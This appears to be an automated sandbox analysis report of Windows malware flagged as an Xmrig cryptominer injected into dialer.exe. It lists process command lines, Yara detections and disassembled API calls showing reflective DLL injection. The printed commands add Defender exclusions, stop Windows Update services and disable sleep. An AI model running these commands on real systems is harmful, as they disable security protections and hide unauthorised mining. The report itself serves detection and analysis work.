Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7255e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff674890000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:25:57
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:25:57
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff70f350000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x7ff656990000
File size:	5'925'152 bytes
MD5 hash:	7BF019893EB8DF6FC169E8F9EF5269C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7ac940000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	17:25:58
Start date:	02/01/2025
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff68eb30000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7255e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7255e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	17:26:00
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff674890000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff674890000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6ec9c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	17:26:01
Start date:	02/01/2025
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff674890000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3320602236.000001888CD31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	17:26:02
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	17:26:03
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	17:26:03
Start date:	02/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF7272712FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134368926.00007FF727271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF727270000, based on PE: true

Associated: 00000000.00000002.2134346135.00007FF727270000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134388113.00007FF727276000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134422766.00007FF72729E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134932581.00007FF72780F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134954654.00007FF727812000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134977303.00007FF727816000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135002394.00007FF72781B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135021736.00007FF72781C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff727270000_hiwA7Blv7C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
Instruction ID: 76c2a588224a8ea8bba164740e4a8414cccb2f3b3252bea1f856f126adda8925
Opcode Fuzzy Hash: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
Instruction Fuzzy Hash: 4FB09260A0420184EA013F419E412586660AB86700F822420C40C0A356CA6C50524B30

Analysis Process: dialer.exePID: 2120, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	45.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	67%
Total number of Nodes:	227
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF68D3D226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D3D1F2C: StrCpyW.SHLWAPI ref: 00007FF68D3D1F5D
Part of subcall function 00007FF68D3D1F2C: StrCatW.SHLWAPI ref: 00007FF68D3D1F6B
Part of subcall function 00007FF68D3D1F2C: GetModuleHandleW.KERNEL32 ref: 00007FF68D3D1F74
Part of subcall function 00007FF68D3D1F2C: GetCurrentProcess.KERNEL32 ref: 00007FF68D3D1F94
Part of subcall function 00007FF68D3D1F2C: K32GetModuleInformation.KERNEL32 ref: 00007FF68D3D1FA8
Part of subcall function 00007FF68D3D1F2C: CreateFileW.KERNELBASE ref: 00007FF68D3D1FD8
Part of subcall function 00007FF68D3D1F2C: CreateFileMappingW.KERNELBASE ref: 00007FF68D3D2002
Part of subcall function 00007FF68D3D1F2C: MapViewOfFile.KERNELBASE ref: 00007FF68D3D2025
Part of subcall function 00007FF68D3D1F2C: lstrcmpiA.KERNEL32 ref: 00007FF68D3D207B
Part of subcall function 00007FF68D3D1F2C: CloseHandle.KERNELBASE ref: 00007FF68D3D20E7
Part of subcall function 00007FF68D3D1F2C: CloseHandle.KERNEL32 ref: 00007FF68D3D20F0
Part of subcall function 00007FF68D3D1F2C: FreeLibrary.KERNEL32 ref: 00007FF68D3D20F9

Part of subcall function 00007FF68D3D1F2C: VirtualProtect.KERNELBASE ref: 00007FF68D3D20AE
Part of subcall function 00007FF68D3D1F2C: VirtualProtect.KERNELBASE ref: 00007FF68D3D20DE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D228F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D229F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D22B9
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68D3D22D0
AdjustTokenPrivileges.KERNELBASE ref: 00007FF68D3D2308
GetLastError.KERNEL32 ref: 00007FF68D3D2312
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D231B
FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D232F
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2346
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D235F
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D2371
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68D3D2261), ref: 00007FF68D3D237E
RegCreateKeyExW.KERNELBASE ref: 00007FF68D3D23BE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF68D3D23E5
RegSetKeySecurity.KERNELBASE ref: 00007FF68D3D23FE
LocalFree.KERNEL32 ref: 00007FF68D3D2408
RegCreateKeyExW.KERNELBASE ref: 00007FF68D3D243E
GetCurrentProcessId.KERNEL32 ref: 00007FF68D3D2448
RegSetValueExW.KERNELBASE ref: 00007FF68D3D246F
RegCloseKey.KERNELBASE ref: 00007FF68D3D2479
RegCloseKey.ADVAPI32 ref: 00007FF68D3D2483
CreateThread.KERNELBASE ref: 00007FF68D3D24A4
GetProcessHeap.KERNEL32 ref: 00007FF68D3D24AA
HeapAlloc.KERNEL32 ref: 00007FF68D3D24B9
CreateThread.KERNELBASE ref: 00007FF68D3D24E8
CreateThread.KERNELBASE ref: 00007FF68D3D2509
SleepEx.KERNELBASE ref: 00007FF68D3D2511

Strings

SeDebugPrivilege, xrefs: 00007FF68D3D22C9
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF68D3D23DE
DLL, xrefs: 00007FF68D3D2321
svc64, xrefs: 00007FF68D3D2452
kernel32.dll, xrefs: 00007FF68D3D2283
pid, xrefs: 00007FF68D3D241B
ntdll.dll, xrefs: 00007FF68D3D2277
SOFTWARE\dialerconfig, xrefs: 00007FF68D3D2399

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 4177739653-1130149537
Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction ID: 53c4c4cf0299758a368adaabfc6705dece2aa82ca9d036277f2f0ece36f0eecf
Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction Fuzzy Hash: CD812A76A08B42D7F7209F61E8445ADB3A1FF8A758B444139D94EC2A64EF3CD54CCB20

Function 00007FF68D3D10C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D3D18AC: OpenProcess.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18CA
Part of subcall function 00007FF68D3D18AC: IsWow64Process.KERNEL32(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18E0
Part of subcall function 00007FF68D3D18AC: CloseHandle.KERNELBASE(?,?,?,00007FF68D3D110E), ref: 00007FF68D3D18FB

OpenProcess.KERNEL32 ref: 00007FF68D3D112C
OpenProcess.KERNEL32 ref: 00007FF68D3D114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF68D3D1170
PathFindFileNameW.SHLWAPI ref: 00007FF68D3D117E
lstrlenW.KERNEL32 ref: 00007FF68D3D118A
StrCpyW.SHLWAPI ref: 00007FF68D3D11A1
CloseHandle.KERNEL32 ref: 00007FF68D3D11AD
StrCmpIW.SHLWAPI ref: 00007FF68D3D11E2
NtQueryInformationProcess.NTDLL ref: 00007FF68D3D1216
OpenProcessToken.ADVAPI32 ref: 00007FF68D3D1240
GetTokenInformation.KERNELBASE ref: 00007FF68D3D126C
GetLastError.KERNEL32 ref: 00007FF68D3D1276
LocalAlloc.KERNEL32 ref: 00007FF68D3D1289
GetTokenInformation.KERNELBASE ref: 00007FF68D3D12B5
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF68D3D12C2
GetSidSubAuthority.ADVAPI32 ref: 00007FF68D3D12D1
LocalFree.KERNEL32 ref: 00007FF68D3D12E9
CloseHandle.KERNEL32 ref: 00007FF68D3D12FD
StrStrA.SHLWAPI ref: 00007FF68D3D13A7
VirtualAllocEx.KERNELBASE ref: 00007FF68D3D140E
WriteProcessMemory.KERNELBASE ref: 00007FF68D3D1431
WaitForSingleObject.KERNEL32 ref: 00007FF68D3D147D
GetExitCodeThread.KERNEL32 ref: 00007FF68D3D1493
CloseHandle.KERNELBASE ref: 00007FF68D3D14AB
CloseHandle.KERNEL32 ref: 00007FF68D3D14B4

Strings

ReflectiveDllMain, xrefs: 00007FF68D3D139D
MSBuild.exe, xrefs: 00007FF68D3D11B8
dialer.exe, xrefs: 00007FF68D3D11CC
@, xrefs: 00007FF68D3D1401

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
API String ID: 2561231171-3753927220
Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction ID: 95896fddcf483bc998bfb257314743c1accfe3dc39718b01957172e1c5c41f5b
Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction Fuzzy Hash: C2B13F61A08643C7EB26DF11E844679A7A5FF46B84F044139DA0EC7798EF3CE949CB60

Function 00007FF68D3D14D8 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF68D3D150B
HeapAlloc.KERNEL32 ref: 00007FF68D3D151E
GetProcessHeap.KERNEL32 ref: 00007FF68D3D152C
